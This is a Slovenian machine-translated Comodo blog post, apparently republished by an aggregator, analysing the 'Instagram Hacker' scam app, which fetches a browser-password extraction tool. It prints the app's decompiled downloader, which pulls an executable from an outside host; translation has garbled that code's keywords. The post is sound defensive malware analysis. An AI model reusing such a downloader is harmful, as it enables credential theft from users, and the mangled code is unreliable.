Čas branja: 4 min
Mnogi ljudje ne jemljejo potencialno neželenih aplikacij (PUA) kot resno nevarnost. Razlog za tako nepremišljen odnos je, da so PUA običajno nameščeni s soglasjem uporabnika. Toda to mnenje je velika napaka. In ne samo zato, ker lahko PUA prikrito namesti druge programe, kot je oglaševalska ali vohunska programska oprema, na osnovi prenosa po poti. Živahni primer spodaj analiziral Comodo Threat Research Labs strokovnjaki jasno kažejo, da je lahko PUA veliko bolj grozeče orožje.
Spoznajte programsko opremo z imenom »Instagram Hacker«. Ima uradno spletno stran https://hackinstagram.net/ in obljublja … da bo vdrl v kateri koli Instagram račun. Še več, lahko ga brezplačno prenesete in namestite.
Po namestitvi vas pozove, da vnesete URL profila Instagram in vdrete v geslo.
Rezultat pride v nekaj sekundah:
Toda po kliku gumba »Ogled gesla« se prikaže novo okno:
S klikom na gumb »Pridobite aktivacijsko kodo« se preusmerite na »Stran za nakup«.
Ponuja nakup »aktivacijske kode«, toda … lahko zavohate goljufijo v zraku? Očitno je, da ne more obstajati programska oprema, ki bi lahko za nekaj sekund zlomila geslo za Instagram. Torej je Instagram Hacker le še eno zavajajoče orodje za preslepitev neumnežev? Najboljši način za preverjanje je, da pogledate v kodo aplikacije.
Koda je zaščitena z Dotnet Reactor, vendar jo je mogoče dekodirati z orodjem de4dot.
In zdaj lahko zagotovo vidimo, da je aplikacija orodje goljufije. Prvi fragment kode samo ponaredi indikator demonstracije napredka.
Toda bolj zanimiv je drug. Kot lahko vidite, vsebuje URL z izvedljivo datoteko za prenos, če je bila aktivacija uspešna.
LoadingWindow()
{
Razred2.qDiUy7EzyuIMj();
this.filename = “view.exe”;
this.uri = nov Uri("http://software-logistics.net/external/component/download/view.exe");
this.InitializeComponent();
če (Datoteka.Obstaja(to.ime.datoteke))
{
File.Delete(this.filename);
}
poskusite
{
WebClient client1 = new WebClient();
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += nov DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
ulov
{
this.method_0();
}
}
}
}
Če zaženemo izvršljivo datoteko, bomo ugotovili, da gre za aplikacijo WebBrowserPassView podjetja NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView je le orodje za ekstrakcijo gesel, ki razkrije gesla, ki so jih shranili spletni brskalniki. Torej vsa gesla, ki jih ta programska oprema lahko izvleče, niso Instagramova, ampak lastna gesla uporabnikov, shranjena v njihovih brskalnikih!
Povzemimo: vse, kar počne Instagram Hacker, je prenos in zagon drugega PUA iz NirSofta. Torej se očitno soočamo z orodjem za goljufije. Opazite tukaj manipulativni psihološki trik: če žrtev odkrije, da je bila prevarana, skoraj ne prijavi policiji o incidentu. Ker bi v tem primeru morala priznati poskus vdora v Instagram, je to dejanje storitve kibernetskega kriminala.
Ampak to je tanek rob.
Najnevarnejša grožnja je, da je URL v aplikaciji mogoče enostavno spremeniti na katero koli drugo z zlonamerno datoteko, ki se bo zagnala na računalniku žrtve. Tako je ta PUA – kot tudi številne druge primere takšne vrste zlonamerne programske opreme – mogoče uporabiti za množično širjenje različne »težke« zlonamerne programske opreme, kot so trojanci, stranska vrata, izsiljevalska in tako naprej
In to je dober razlog, da PUA vzamemo za res nevarno zlonamerno programsko opremo. Ker se lahko izkaže, da je odskočna deska za uničujoč množičen kibernetski napad.
»Danes ne bi smeli razmišljati zlonamerna programska oprema nevarne ali manj nevarne,« pravi Fatih Orhan, vodja Comodo Threat Research Labs. "Kaj zlonamerna programska oprema ne obstaja v izoliranem prostoru. Dandanes kibernetski kriminalci gradijo dolge verige zlonamerne programske opreme za napad na uporabnike in, kot lahko vidite, je PUA lahko člen v takšni verigi ubijanja. Torej bi morali imenovati stvari s pravimi pravili. Da, te aplikacije se prenesejo in zaženejo z odobritvijo uporabnikov, vendar je odobritev, kot v tem primeru, izsiljena z goljufijo. V vseh potencialno neželenih aplikacijah, ki se pretvarjajo, da so zakonite, morajo vsi razumeti, da je to samo kamuflaža. Zato Comodo ne zagotavlja le vrhunske tehnične zaščite, temveč uporabnike redno obvešča, da jih prepreči pred nevarnimi pastmi v kibernetskem prostoru.”
Živite varno s Comodo!
Sorodni viri
Napad na Wikipedijo DDOS
Odstranjevanje zlonamerne programske opreme
Spletni program zlonamerne programske opreme
Najboljša varnost spletnega mesta
WordPress Security
ZAČNITE BREZPLAČEN PREIZKUS BREZPLAČNO SVOJO MESTO ZAGOTAVLJAJO
- Distribucija vsebine in PR s pomočjo SEO. Okrepite se še danes.
- Platoblockchain. Web3 Metaverse Intelligence. Razširjeno znanje. Dostopite tukaj.
- vir: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- Sposobna
- O meni
- Račun
- Zakon
- Aktiviranje
- po
- AIR
- vsi
- in
- Še ena
- uporaba
- aplikacije
- odobritev
- napad
- odnos
- Skrite
- Osnova
- ker
- BEST
- Big
- Blog
- Break
- brskalniki
- izgradnjo
- Gumb
- nakup
- klic
- primeru
- verige
- verige
- preveriti
- jasno
- Koda
- storiti
- Soglasje
- Razmislite
- Vsebuje
- Kibernetski napad
- kibernetski kriminaliteti
- cybercriminals
- NEVARNOST
- Nevarno
- DDoS
- uničujoče
- Odkritelji
- dont
- podvojila
- prenesi
- enostavno
- Edge
- Vnesite
- itd
- Event
- Primer
- Primeri
- Strokovnjaki
- ekstrakt
- Obraz
- Nekaj
- file
- Najdi
- prva
- goljufija
- brezplačno
- iz
- dobili
- dobro
- več
- kramp
- heker
- Glava
- tukaj
- Kako
- Kako
- HTML
- HTTPS
- in
- nesreča
- Kazalec
- namestitev
- instant
- Zanimivo
- izolirani
- IT
- Labs
- začetek
- LINK
- Long
- Poglej
- stroj
- zlonamerna programska oprema
- Napad zlonamerne programske opreme
- več
- ogromen
- max širine
- napaka
- več
- Najbolj
- Imenovan
- potrebe
- Novo
- Očitna
- Ponudbe
- Uradni
- Uradna spletna stran
- ONE
- Mnenje
- Ostalo
- lastne
- Geslo
- gesla
- ljudje
- PHP
- platon
- Platonova podatkovna inteligenca
- PlatoData
- policija
- potencialno
- preprečiti
- profil
- programi
- Napredek
- Obljublja
- zaščiteni
- zaščita
- zagotavljajo
- uresničitev
- Razlog
- nepremišljeno
- redno
- Poročila
- Raziskave
- povzroči
- Nadaljuj
- Razkrije
- znebi
- Run
- Scorecard
- sekund
- zavarovanje
- varnost
- resno
- shouldnt
- So
- Software
- Vesolje
- Vohunska programska oprema
- shranjeni
- uspešno
- taka
- Bodite
- tehnični
- O
- njihove
- Grožnja
- vsej
- čas
- do
- orodje
- pasti
- OBRAT
- razumeli
- nezaželen
- URL
- uporabnik
- Uporabniki
- navadno
- različnih
- Žrtva
- Poglej
- web
- Spletni brskalniki
- Spletna stran
- bo
- bi
- Vi
- Vaša rutina za
- zefirnet